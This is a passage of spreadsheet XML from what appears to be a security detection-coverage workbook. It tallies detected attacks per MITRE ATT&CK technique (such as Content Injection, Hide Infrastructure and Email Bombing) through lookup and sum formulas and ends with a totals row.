      </c>
      <c r="AU75" s="13">
        <v>0</v>
      </c>
      <c r="AV75" s="394">
        <v>0</v>
      </c>
      <c r="AW75" s="392">
        <v>0</v>
      </c>
      <c r="AX75" s="392">
        <v>0</v>
      </c>
      <c r="AY75" s="322">
        <v>0</v>
      </c>
      <c r="AZ75" s="4">
        <v>0</v>
      </c>
      <c r="BA75" s="16">
        <v>0</v>
      </c>
      <c r="BB75" s="394">
        <v>0</v>
      </c>
      <c r="BC75" s="292">
        <v>39</v>
      </c>
      <c r="BD75" s="322">
        <v>39</v>
      </c>
      <c r="BE75" s="322">
        <v>0</v>
      </c>
      <c r="BF75" s="12">
        <v>1</v>
      </c>
      <c r="BG75" s="13">
        <v>1</v>
      </c>
      <c r="BH75" s="394">
        <v>39</v>
      </c>
      <c r="BI75" s="292">
        <v>0</v>
      </c>
      <c r="BJ75" s="322">
        <v>0</v>
      </c>
      <c r="BK75" s="322">
        <v>0</v>
      </c>
      <c r="BL75" s="12">
        <v>0</v>
      </c>
      <c r="BM75" s="13">
        <v>0</v>
      </c>
      <c r="BN75" s="394">
        <v>0</v>
      </c>
      <c r="BO75" s="292">
        <v>49</v>
      </c>
      <c r="BP75" s="322">
        <v>49</v>
      </c>
      <c r="BQ75" s="322">
        <v>0</v>
      </c>
      <c r="BR75" s="12">
        <v>0</v>
      </c>
      <c r="BS75" s="12">
        <v>6</v>
      </c>
      <c r="BT75" s="13">
        <v>1</v>
      </c>
      <c r="BU75" s="394">
        <v>49</v>
      </c>
      <c r="BV75" s="292">
        <v>0</v>
      </c>
      <c r="BW75" s="322">
        <v>0</v>
      </c>
      <c r="BX75" s="322">
        <v>0</v>
      </c>
      <c r="BY75" s="12">
        <v>0</v>
      </c>
      <c r="BZ75" s="13">
        <v>0</v>
      </c>
      <c r="CA75" s="394">
        <v>0</v>
      </c>
      <c r="CB75" s="292">
        <v>0</v>
      </c>
      <c r="CC75" s="322">
        <v>0</v>
      </c>
      <c r="CD75" s="322">
        <v>0</v>
      </c>
      <c r="CE75" s="12">
        <v>0</v>
      </c>
      <c r="CF75" s="12">
        <v>0</v>
      </c>
      <c r="CG75" s="13">
        <v>0</v>
      </c>
      <c r="CH75" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:98" ht="15" customHeight="1">
      <c r="A76" s="4">
        <f t="shared" si="2"/>
        <v>74</v>
      </c>
      <c r="B76" s="4" t="str">
        <f>IFERROR(VLOOKUP(A76,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1659</v>
      </c>
      <c r="C76" s="4" t="str">
        <f>IFERROR(VLOOKUP(B76,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Content Injection</v>
      </c>
      <c r="D76" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B76)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E76" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B76,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>89</v>
      </c>
      <c r="F76" s="286" t="str">
        <f t="shared" si="3"/>
        <v>1 (89)</v>
      </c>
      <c r="G76" s="292">
        <v>2</v>
      </c>
      <c r="H76" s="322">
        <v>2</v>
      </c>
      <c r="I76" s="322">
        <v>0</v>
      </c>
      <c r="J76" s="12">
        <v>2</v>
      </c>
      <c r="K76" s="13">
        <v>1</v>
      </c>
      <c r="L76" s="394">
        <v>2</v>
      </c>
      <c r="M76" s="322">
        <v>3</v>
      </c>
      <c r="N76" s="322">
        <v>3</v>
      </c>
      <c r="O76" s="322">
        <v>0</v>
      </c>
      <c r="P76" s="12">
        <v>3</v>
      </c>
      <c r="Q76" s="13">
        <v>1</v>
      </c>
      <c r="R76" s="394">
        <v>2</v>
      </c>
      <c r="S76" s="292">
        <v>5</v>
      </c>
      <c r="T76" s="322">
        <v>5</v>
      </c>
      <c r="U76" s="322">
        <v>0</v>
      </c>
      <c r="V76" s="12">
        <v>5</v>
      </c>
      <c r="W76" s="13">
        <v>1</v>
      </c>
      <c r="X76" s="394">
        <v>3</v>
      </c>
      <c r="Y76" s="392">
        <v>17</v>
      </c>
      <c r="Z76" s="392">
        <v>13</v>
      </c>
      <c r="AA76" s="322">
        <v>0</v>
      </c>
      <c r="AB76" s="392">
        <v>10</v>
      </c>
      <c r="AC76" s="16">
        <v>1</v>
      </c>
      <c r="AD76" s="394">
        <v>9</v>
      </c>
      <c r="AE76" s="392">
        <v>62</v>
      </c>
      <c r="AF76" s="392">
        <v>25</v>
      </c>
      <c r="AG76" s="322">
        <v>0</v>
      </c>
      <c r="AH76" s="392">
        <v>11</v>
      </c>
      <c r="AI76" s="16">
        <v>1</v>
      </c>
      <c r="AJ76" s="394">
        <v>18</v>
      </c>
      <c r="AK76" s="392">
        <v>79</v>
      </c>
      <c r="AL76" s="392">
        <v>38</v>
      </c>
      <c r="AM76" s="322">
        <v>0</v>
      </c>
      <c r="AN76" s="392">
        <v>21</v>
      </c>
      <c r="AO76" s="16">
        <v>1</v>
      </c>
      <c r="AP76" s="394">
        <v>24</v>
      </c>
      <c r="AQ76" s="292">
        <v>0</v>
      </c>
      <c r="AR76" s="322">
        <v>0</v>
      </c>
      <c r="AS76" s="322">
        <v>0</v>
      </c>
      <c r="AT76" s="12">
        <v>0</v>
      </c>
      <c r="AU76" s="13">
        <v>0</v>
      </c>
      <c r="AV76" s="394">
        <v>0</v>
      </c>
      <c r="AW76" s="392">
        <v>5</v>
      </c>
      <c r="AX76" s="392">
        <v>2</v>
      </c>
      <c r="AY76" s="322">
        <v>0</v>
      </c>
      <c r="AZ76" s="4">
        <v>2</v>
      </c>
      <c r="BA76" s="16">
        <v>1</v>
      </c>
      <c r="BB76" s="394">
        <v>2</v>
      </c>
      <c r="BC76" s="292">
        <v>10</v>
      </c>
      <c r="BD76" s="322">
        <v>7</v>
      </c>
      <c r="BE76" s="322">
        <v>0</v>
      </c>
      <c r="BF76" s="12">
        <v>7</v>
      </c>
      <c r="BG76" s="13">
        <v>1</v>
      </c>
      <c r="BH76" s="394">
        <v>4</v>
      </c>
      <c r="BI76" s="292">
        <v>2</v>
      </c>
      <c r="BJ76" s="322">
        <v>1</v>
      </c>
      <c r="BK76" s="322">
        <v>0</v>
      </c>
      <c r="BL76" s="12">
        <v>1</v>
      </c>
      <c r="BM76" s="13">
        <v>1</v>
      </c>
      <c r="BN76" s="394">
        <v>1</v>
      </c>
      <c r="BO76" s="292">
        <v>93</v>
      </c>
      <c r="BP76" s="322">
        <v>86</v>
      </c>
      <c r="BQ76" s="322">
        <v>0</v>
      </c>
      <c r="BR76" s="12">
        <v>1</v>
      </c>
      <c r="BS76" s="12">
        <v>11</v>
      </c>
      <c r="BT76" s="13">
        <v>1</v>
      </c>
      <c r="BU76" s="394">
        <v>86</v>
      </c>
      <c r="BV76" s="292">
        <v>0</v>
      </c>
      <c r="BW76" s="322">
        <v>0</v>
      </c>
      <c r="BX76" s="322">
        <v>0</v>
      </c>
      <c r="BY76" s="12">
        <v>0</v>
      </c>
      <c r="BZ76" s="13">
        <v>0</v>
      </c>
      <c r="CA76" s="394">
        <v>0</v>
      </c>
      <c r="CB76" s="292">
        <v>3</v>
      </c>
      <c r="CC76" s="322">
        <v>3</v>
      </c>
      <c r="CD76" s="322">
        <v>0</v>
      </c>
      <c r="CE76" s="12">
        <v>0</v>
      </c>
      <c r="CF76" s="12">
        <v>1</v>
      </c>
      <c r="CG76" s="13">
        <v>1</v>
      </c>
      <c r="CH76" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="77" spans="1:98" ht="15" customHeight="1">
      <c r="A77" s="4">
        <f t="shared" si="2"/>
        <v>75</v>
      </c>
      <c r="B77" s="4" t="str">
        <f>IFERROR(VLOOKUP(A77,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1665</v>
      </c>
      <c r="C77" s="4" t="str">
        <f>IFERROR(VLOOKUP(B77,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hide Infrastructure</v>
      </c>
      <c r="D77" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B77)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F77" s="286" t="str">
        <f t="shared" si="3"/>
        <v>1 (12)</v>
      </c>
      <c r="G77" s="292">
        <v>18</v>
      </c>
      <c r="H77" s="322">
        <v>4</v>
      </c>
      <c r="I77" s="322">
        <v>0</v>
      </c>
      <c r="J77" s="12">
        <v>2</v>
      </c>
      <c r="K77" s="13">
        <v>1</v>
      </c>
      <c r="L77" s="394">
        <v>4</v>
      </c>
      <c r="M77" s="322">
        <v>0</v>
      </c>
      <c r="N77" s="322">
        <v>0</v>
      </c>
      <c r="O77" s="322">
        <v>0</v>
      </c>
      <c r="P77" s="12">
        <v>0</v>
      </c>
      <c r="Q77" s="13">
        <v>0</v>
      </c>
      <c r="R77" s="394">
        <v>0</v>
      </c>
      <c r="S77" s="292">
        <v>18</v>
      </c>
      <c r="T77" s="322">
        <v>4</v>
      </c>
      <c r="U77" s="322">
        <v>0</v>
      </c>
      <c r="V77" s="12">
        <v>2</v>
      </c>
      <c r="W77" s="13">
        <v>1</v>
      </c>
      <c r="X77" s="394">
        <v>4</v>
      </c>
      <c r="Y77" s="392">
        <v>286</v>
      </c>
      <c r="Z77" s="392">
        <v>11</v>
      </c>
      <c r="AA77" s="322">
        <v>0</v>
      </c>
      <c r="AB77" s="392">
        <v>4</v>
      </c>
      <c r="AC77" s="16">
        <v>1</v>
      </c>
      <c r="AD77" s="394">
        <v>9</v>
      </c>
      <c r="AE77" s="392">
        <v>6</v>
      </c>
      <c r="AF77" s="392">
        <v>6</v>
      </c>
      <c r="AG77" s="322">
        <v>0</v>
      </c>
      <c r="AH77" s="392">
        <v>2</v>
      </c>
      <c r="AI77" s="16">
        <v>1</v>
      </c>
      <c r="AJ77" s="394">
        <v>3</v>
      </c>
      <c r="AK77" s="392">
        <v>292</v>
      </c>
      <c r="AL77" s="392">
        <v>17</v>
      </c>
      <c r="AM77" s="322">
        <v>0</v>
      </c>
      <c r="AN77" s="392">
        <v>6</v>
      </c>
      <c r="AO77" s="16">
        <v>1</v>
      </c>
      <c r="AP77" s="394">
        <v>10</v>
      </c>
      <c r="AQ77" s="292">
        <v>0</v>
      </c>
      <c r="AR77" s="322">
        <v>0</v>
      </c>
      <c r="AS77" s="322">
        <v>0</v>
      </c>
      <c r="AT77" s="12">
        <v>0</v>
      </c>
      <c r="AU77" s="13">
        <v>0</v>
      </c>
      <c r="AV77" s="394">
        <v>0</v>
      </c>
      <c r="AW77" s="392">
        <v>4</v>
      </c>
      <c r="AX77" s="392">
        <v>1</v>
      </c>
      <c r="AY77" s="322">
        <v>0</v>
      </c>
      <c r="AZ77" s="4">
        <v>1</v>
      </c>
      <c r="BA77" s="16">
        <v>1</v>
      </c>
      <c r="BB77" s="394">
        <v>1</v>
      </c>
      <c r="BC77" s="292">
        <v>22</v>
      </c>
      <c r="BD77" s="322">
        <v>5</v>
      </c>
      <c r="BE77" s="322">
        <v>0</v>
      </c>
      <c r="BF77" s="12">
        <v>3</v>
      </c>
      <c r="BG77" s="13">
        <v>1</v>
      </c>
      <c r="BH77" s="394">
        <v>5</v>
      </c>
      <c r="BI77" s="292">
        <v>6</v>
      </c>
      <c r="BJ77" s="322">
        <v>2</v>
      </c>
      <c r="BK77" s="322">
        <v>0</v>
      </c>
      <c r="BL77" s="12">
        <v>1</v>
      </c>
      <c r="BM77" s="13">
        <v>1</v>
      </c>
      <c r="BN77" s="394">
        <v>2</v>
      </c>
      <c r="BO77" s="292">
        <v>19</v>
      </c>
      <c r="BP77" s="322">
        <v>15</v>
      </c>
      <c r="BQ77" s="322">
        <v>0</v>
      </c>
      <c r="BR77" s="12">
        <v>1</v>
      </c>
      <c r="BS77" s="12">
        <v>6</v>
      </c>
      <c r="BT77" s="13">
        <v>1</v>
      </c>
      <c r="BU77" s="394">
        <v>10</v>
      </c>
      <c r="BV77" s="292">
        <v>2</v>
      </c>
      <c r="BW77" s="322">
        <v>2</v>
      </c>
      <c r="BX77" s="322">
        <v>0</v>
      </c>
      <c r="BY77" s="12">
        <v>1</v>
      </c>
      <c r="BZ77" s="13">
        <v>1</v>
      </c>
      <c r="CA77" s="394">
        <v>2</v>
      </c>
      <c r="CB77" s="292">
        <v>20</v>
      </c>
      <c r="CC77" s="322">
        <v>8</v>
      </c>
      <c r="CD77" s="322">
        <v>0</v>
      </c>
      <c r="CE77" s="12">
        <v>1</v>
      </c>
      <c r="CF77" s="12">
        <v>1</v>
      </c>
      <c r="CG77" s="13">
        <v>1</v>
      </c>
      <c r="CH77" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="78" spans="1:98" ht="15" customHeight="1">
      <c r="A78" s="4">
        <f t="shared" si="2"/>
        <v>76</v>
      </c>
      <c r="B78" s="4" t="str">
        <f>IFERROR(VLOOKUP(A78,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1667</v>
      </c>
      <c r="C78" s="493" t="str">
        <f>IFERROR(VLOOKUP(B78,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Bombing</v>
      </c>
      <c r="D78" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B78)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>100</v>
      </c>
      <c r="F78" s="286" t="str">
        <f t="shared" si="3"/>
        <v>1 (100)</v>
      </c>
      <c r="G78" s="292">
        <v>2</v>
      </c>
      <c r="H78" s="322">
        <v>2</v>
      </c>
      <c r="I78" s="322">
        <v>0</v>
      </c>
      <c r="J78" s="12">
        <v>1</v>
      </c>
      <c r="K78" s="13">
        <v>1</v>
      </c>
      <c r="L78" s="394">
        <v>2</v>
      </c>
      <c r="M78" s="322">
        <v>0</v>
      </c>
      <c r="N78" s="322">
        <v>0</v>
      </c>
      <c r="O78" s="322">
        <v>0</v>
      </c>
      <c r="P78" s="12">
        <v>0</v>
      </c>
      <c r="Q78" s="13">
        <v>0</v>
      </c>
      <c r="R78" s="394">
        <v>0</v>
      </c>
      <c r="S78" s="292">
        <v>2</v>
      </c>
      <c r="T78" s="322">
        <v>2</v>
      </c>
      <c r="U78" s="322">
        <v>0</v>
      </c>
      <c r="V78" s="12">
        <v>1</v>
      </c>
      <c r="W78" s="13">
        <v>1</v>
      </c>
      <c r="X78" s="394">
        <v>2</v>
      </c>
      <c r="Y78" s="392">
        <v>2</v>
      </c>
      <c r="Z78" s="392">
        <v>2</v>
      </c>
      <c r="AA78" s="322">
        <v>0</v>
      </c>
      <c r="AB78" s="392">
        <v>1</v>
      </c>
      <c r="AC78" s="16">
        <v>1</v>
      </c>
      <c r="AD78" s="394">
        <v>2</v>
      </c>
      <c r="AE78" s="392">
        <v>4</v>
      </c>
      <c r="AF78" s="392">
        <v>2</v>
      </c>
      <c r="AG78" s="322">
        <v>0</v>
      </c>
      <c r="AH78" s="392">
        <v>2</v>
      </c>
      <c r="AI78" s="16">
        <v>1</v>
      </c>
      <c r="AJ78" s="394">
        <v>1</v>
      </c>
      <c r="AK78" s="392">
        <v>6</v>
      </c>
      <c r="AL78" s="392">
        <v>4</v>
      </c>
      <c r="AM78" s="322">
        <v>0</v>
      </c>
      <c r="AN78" s="392">
        <v>3</v>
      </c>
      <c r="AO78" s="16">
        <v>1</v>
      </c>
      <c r="AP78" s="394">
        <v>3</v>
      </c>
      <c r="AQ78" s="292">
        <v>0</v>
      </c>
      <c r="AR78" s="322">
        <v>0</v>
      </c>
      <c r="AS78" s="322">
        <v>0</v>
      </c>
      <c r="AT78" s="12">
        <v>0</v>
      </c>
      <c r="AU78" s="13">
        <v>0</v>
      </c>
      <c r="AV78" s="394">
        <v>0</v>
      </c>
      <c r="AW78" s="392">
        <v>0</v>
      </c>
      <c r="AX78" s="392">
        <v>0</v>
      </c>
      <c r="AY78" s="322">
        <v>0</v>
      </c>
      <c r="AZ78" s="4">
        <v>0</v>
      </c>
      <c r="BA78" s="16">
        <v>0</v>
      </c>
      <c r="BB78" s="394">
        <v>0</v>
      </c>
      <c r="BC78" s="292">
        <v>2</v>
      </c>
      <c r="BD78" s="322">
        <v>2</v>
      </c>
      <c r="BE78" s="322">
        <v>0</v>
      </c>
      <c r="BF78" s="12">
        <v>1</v>
      </c>
      <c r="BG78" s="13">
        <v>1</v>
      </c>
      <c r="BH78" s="394">
        <v>2</v>
      </c>
      <c r="BI78" s="292">
        <v>0</v>
      </c>
      <c r="BJ78" s="322">
        <v>0</v>
      </c>
      <c r="BK78" s="322">
        <v>0</v>
      </c>
      <c r="BL78" s="12">
        <v>0</v>
      </c>
      <c r="BM78" s="13">
        <v>0</v>
      </c>
      <c r="BN78" s="394">
        <v>0</v>
      </c>
      <c r="BO78" s="292">
        <v>100</v>
      </c>
      <c r="BP78" s="322">
        <v>100</v>
      </c>
      <c r="BQ78" s="322">
        <v>0</v>
      </c>
      <c r="BR78" s="12">
        <v>0</v>
      </c>
      <c r="BS78" s="12">
        <v>1</v>
      </c>
      <c r="BT78" s="13">
        <v>1</v>
      </c>
      <c r="BU78" s="394">
        <v>100</v>
      </c>
      <c r="BV78" s="292">
        <v>0</v>
      </c>
      <c r="BW78" s="322">
        <v>0</v>
      </c>
      <c r="BX78" s="322">
        <v>0</v>
      </c>
      <c r="BY78" s="12">
        <v>0</v>
      </c>
      <c r="BZ78" s="13">
        <v>0</v>
      </c>
      <c r="CA78" s="394">
        <v>0</v>
      </c>
      <c r="CB78" s="292">
        <v>0</v>
      </c>
      <c r="CC78" s="322">
        <v>0</v>
      </c>
      <c r="CD78" s="322">
        <v>0</v>
      </c>
      <c r="CE78" s="12">
        <v>0</v>
      </c>
      <c r="CF78" s="12">
        <v>0</v>
      </c>
      <c r="CG78" s="13">
        <v>0</v>
      </c>
      <c r="CH78" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:98" s="4" customFormat="1" ht="15" customHeight="1">
      <c r="A79" s="660" t="s">
        <v>176</v>
      </c>
      <c r="B79" s="661"/>
      <c r="C79" s="662"/>
      <c r="D79" s="11">
        <f>SUM(D3:D78)</f>
        <v>110</v>
      </c>
      <c r="E79" s="11">
        <f>SUM(E3:E78)</f>
        <v>3573695</v>
      </c>
      <c r="F79" s="580" t="str">
        <f>D79&amp;" ("&amp;E79&amp;")"</f>
        <v>110 (3573695)</v>
      </c>
      <c r="G79" s="289">
        <f>SUM(G3:G78)</f>
        <v>37259</v>
      </c>
      <c r="H79" s="581">
        <f>SUM(H3:H78)</f>
        <v>13523</v>
      </c>
      <c r="I79" s="581" t="str">
        <f t="shared" ref="I79" si="4">H79 &amp; " (" &amp; G79 &amp; ")"</f>
        <v>13523 (37259)</v>
      </c>
      <c r="J79" s="11">
        <f>SUM(J3:J78)</f>
        <v>155</v>
      </c>
      <c r="K79" s="14">
        <f>SUMPRODUCT($D3:$D$78,K3:K78)/$D$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="L79" s="395">
        <f>SUM(L$3:L$78)</f>
        <v>13051</v>
      </c>
      <c r="M79" s="581">
        <f>SUM(M3:M78)</f>
        <v>13179</v>
      </c>
      <c r="N79" s="581">
        <f>SUM(N3:N78)</f>
        <v>4968</v>
      </c>
      <c r="O79" s="581" t="str">
        <f t="shared" ref="O79" si="5">N79 &amp; " (" &amp; M79 &amp; ")"</f>
        <v>4968 (13179)</v>
      </c>
      <c r="P79" s="11">
        <f>SUM(P3:P78)</f>
        <v>296</v>
      </c>
      <c r="Q79" s="14">
        <f>SUMPRODUCT($D3:$D$78,Q3:Q78)/$D$79</f>
        <v>0.46363636363636362</v>
      </c>
      <c r="R79" s="290">
        <f>SUM(R$3:R$78)</f>
        <v>3229</v>
      </c>
      <c r="S79" s="289">
        <f>SUM(S3:S78)</f>
        <v>50438</v>
      </c>
      <c r="T79" s="581">
        <f>SUM(T3:T78)</f>
        <v>18491</v>
      </c>
      <c r="U79" s="581" t="str">
        <f t="shared" ref="U79" si="6">T79 &amp; " (" &amp; S79 &amp; ")"</f>
        <v>18491 (50438)</v>
      </c>
      <c r="V79" s="11">
        <f>SUM(V3:V78)</f>
        <v>451</v>
      </c>
      <c r="W79" s="14">
        <f>SUMPRODUCT($D3:$D$78,W3:W78)/$D$79</f>
        <v>0.8</v>
      </c>
      <c r="X79" s="395">
        <f>SUM(X$3:X$78)</f>
        <v>15080</v>
      </c>
      <c r="Y79" s="581">
        <f>SUM(Y3:Y78)</f>
        <v>1799319</v>
      </c>
      <c r="Z79" s="581">
        <f>SUM(Z3:Z78)</f>
        <v>383176</v>
      </c>
      <c r="AA79" s="581" t="str">
        <f t="shared" ref="AA79" si="7">Z79 &amp; " (" &amp; Y79 &amp; ")"</f>
        <v>383176 (1799319)</v>
      </c>
      <c r="AB79" s="11">
        <f>SUM(AB3:AB78)</f>
        <v>919</v>
      </c>
      <c r="AC79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AC3:AC78)/$D$79</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="AD79" s="290">
        <f>SUM(AD$3:AD$78)</f>
        <v>206693</v>
      </c>
      <c r="AE79" s="289">
        <f>SUM(AE3:AE78)</f>
        <v>367811</v>
      </c>
      <c r="AF79" s="581">
        <f>SUM(AF3:AF78)</f>
        <v>192858</v>
      </c>
      <c r="AG79" s="581" t="str">
        <f t="shared" ref="AG79" si="8">AF79 &amp; " (" &amp; AE79 &amp; ")"</f>
        <v>192858 (367811)</v>
      </c>
      <c r="AH79" s="11">
        <f>SUM(AH3:AH78)</f>
        <v>983</v>
      </c>
      <c r="AI79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AI3:AI78)/$D$79</f>
        <v>1</v>
      </c>
      <c r="AJ79" s="395">
        <f>SUM(AJ$3:AJ$78)</f>
        <v>127698</v>
      </c>
      <c r="AK79" s="581">
        <f>SUM(AK3:AK78)</f>
        <v>2157395</v>
      </c>
      <c r="AL79" s="581">
        <f>SUM(AL3:AL78)</f>
        <v>572909</v>
      </c>
      <c r="AM79" s="581" t="str">
        <f t="shared" ref="AM79" si="9">AL79 &amp; " (" &amp; AK79 &amp; ")"</f>
        <v>572909 (2157395)</v>
      </c>
      <c r="AN79" s="11">
        <f>SUM(AN3:AN78)</f>
        <v>1899</v>
      </c>
      <c r="AO79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AO3:AO78)/$D$79</f>
        <v>1</v>
      </c>
      <c r="AP79" s="290">
        <f>SUM(AP$3:AP$78)</f>
        <v>268349</v>
      </c>
      <c r="AQ79" s="289">
        <f>SUM(AQ3:AQ78)</f>
        <v>16</v>
      </c>
      <c r="AR79" s="581">
        <f>SUM(AR3:AR78)</f>
        <v>2</v>
      </c>
      <c r="AS79" s="581" t="str">
        <f t="shared" ref="AS79" si="10">AR79 &amp; " (" &amp; AQ79 &amp; ")"</f>
        <v>2 (16)</v>
      </c>
      <c r="AT79" s="11">
        <f>SUM(AT3:AT78)</f>
        <v>2</v>
      </c>
      <c r="AU79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AU3:AU78)/$D$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="AV79" s="395">
        <f>SUM(AV$3:AV$78)</f>
        <v>1</v>
      </c>
      <c r="AW79" s="581">
        <f>SUM(AW3:AW78)</f>
        <v>25704</v>
      </c>
      <c r="AX79" s="581">
        <f>SUM(AX3:AX78)</f>
        <v>8207</v>
      </c>
      <c r="AY79" s="581" t="str">
        <f t="shared" ref="AY79" si="11">AX79 &amp; " (" &amp; AW79 &amp; ")"</f>
        <v>8207 (25704)</v>
      </c>
      <c r="AZ79" s="11">
        <f>SUM(AZ3:AZ78)</f>
        <v>511</v>
      </c>
      <c r="BA79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BA3:BA78)/$D$79</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="BB79" s="290">
        <f>SUM(BB$3:BB$78)</f>
        <v>4168</v>
      </c>
      <c r="BC79" s="289">
        <f>SUM(BC3:BC78)</f>
        <v>76126</v>
      </c>
      <c r="BD79" s="581">
        <f>SUM(BD3:BD78)</f>
        <v>26696</v>
      </c>
      <c r="BE79" s="581" t="str">
        <f t="shared" ref="BE79" si="12">BD79 &amp; " (" &amp; BC79 &amp; ")"</f>
        <v>26696 (76126)</v>
      </c>
      <c r="BF79" s="11">
        <f>SUM(BF3:BF78)</f>
        <v>960</v>
      </c>
      <c r="BG79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BG3:BG78)/$D$79</f>
        <v>0.88181818181818183</v>
      </c>
      <c r="BH79" s="395">
        <f>SUM(BH$3:BH$78)</f>
        <v>16148</v>
      </c>
      <c r="BI79" s="289">
        <f>SUM(BI3:BI78)</f>
        <v>656947</v>
      </c>
      <c r="BJ79" s="581">
        <f>SUM(BJ3:BJ78)</f>
        <v>655807</v>
      </c>
      <c r="BK79" s="581" t="str">
        <f t="shared" ref="BK79" si="13">BJ79 &amp; " (" &amp; BI79 &amp; ")"</f>
        <v>655807 (656947)</v>
      </c>
      <c r="BL79" s="11">
        <f>SUM(BL3:BL78)</f>
        <v>197</v>
      </c>
      <c r="BM79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BM3:BM78)/$D$79</f>
        <v>0.5757575757575758</v>
      </c>
      <c r="BN79" s="290">
        <f>SUM(BN$3:BN$78)</f>
        <v>654909</v>
      </c>
      <c r="BO79" s="289">
        <f>SUM(BO3:BO78)</f>
        <v>1989396</v>
      </c>
      <c r="BP79" s="581">
        <f>SUM(BP3:BP78)</f>
        <v>1977311</v>
      </c>
      <c r="BQ79" s="581" t="str">
        <f t="shared" ref="BQ79" si="14">BP79 &amp; " (" &amp; BO79 &amp; ")"</f>
        <v>1977311 (1989396)</v>
      </c>
      <c r="BR79" s="11">
        <f>SUM(BR3:BR78)</f>
        <v>197</v>
      </c>
      <c r="BS79" s="11">
        <f>SUM(BS3:BS78)</f>
        <v>305</v>
      </c>
      <c r="BT79" s="472">
        <f>SUMPRODUCT($D3:$D$78,BT3:BT78)/$D$79</f>
        <v>0.94848484848484849</v>
      </c>
      <c r="BU79" s="580">
        <f>SUM(BU3:BU78)</f>
        <v>1022201</v>
      </c>
      <c r="BV79" s="289">
        <f>SUM(BV3:BV78)</f>
        <v>19980</v>
      </c>
      <c r="BW79" s="581">
        <f>SUM(BW3:BW78)</f>
        <v>19923</v>
      </c>
      <c r="BX79" s="581" t="str">
        <f t="shared" ref="BX79" si="15">BW79 &amp; " (" &amp; BV79 &amp; ")"</f>
        <v>19923 (19980)</v>
      </c>
      <c r="BY79" s="11">
        <f>SUM(BY3:BY78)</f>
        <v>82</v>
      </c>
      <c r="BZ79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BZ3:BZ78)/$D$79</f>
        <v>0.3</v>
      </c>
      <c r="CA79" s="395">
        <f>SUM(CA$3:CA$78)</f>
        <v>19860</v>
      </c>
      <c r="CB79" s="581">
        <f>SUM(CB3:CB78)</f>
        <v>4012989</v>
      </c>
      <c r="CC79" s="581">
        <f>SUM(CC3:CC78)</f>
        <v>2508032</v>
      </c>
      <c r="CD79" s="581" t="str">
        <f t="shared" ref="CD79" si="16">CC79 &amp; " (" &amp; CB79 &amp; ")"</f>
        <v>2508032 (4012989)</v>
      </c>
      <c r="CE79" s="11">
        <f>SUM(CE3:CE78)</f>
        <v>82</v>
      </c>
      <c r="CF79" s="11">
        <f>SUM(CF3:CF78)</f>
        <v>75</v>
      </c>
      <c r="CG79" s="14">
        <f>SUMPRODUCT($D3:$D$78,CG3:CG78)/$D$79</f>
        <v>0.66363636363636369</v>
      </c>
      <c r="CH79" s="514">
        <f>SUM(CH3:CH78)</f>
        <v>2488113</v>
      </c>
      <c r="CI79" s="3"/>
      <c r="CJ79" s="3"/>
      <c r="CK79" s="3"/>
      <c r="CL79" s="3"/>
      <c r="CM79" s="3"/>
      <c r="CN79" s="3"/>
      <c r="CO79" s="3"/>
      <c r="CP79" s="3"/>
      <c r="CQ79" s="3"/>
      <c r="CR79" s="3"/>
      <c r="CS79" s="3"/>
      <c r="CT79" s="3"/>
    </row>
    <row r="80" spans="1:98" s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A80" s="15"/>
      <c r="B80" s="3"/>
      <c r="C80" s="3"/>
      <c r="D80" s="1"/>
      <c r="E80" s="1"/>
      <c r="F80" s="3"/>
      <c r="G80" s="3"/>
      <c r="H80" s="3"/>
      <c r="I80" s="3"/>
      <c r="J80" s="3"/>
      <c r="K80" s="738"/>
      <c r="L80" s="738"/>
      <c r="M80" s="738"/>
      <c r="N80" s="738"/>
      <c r="O80" s="738"/>
      <c r="P80" s="738"/>
      <c r="Q80" s="738"/>
      <c r="R80" s="1"/>
      <c r="S80" s="1"/>
      <c r="T80" s="1"/>
      <c r="U80" s="1"/>
      <c r="V80" s="1"/>
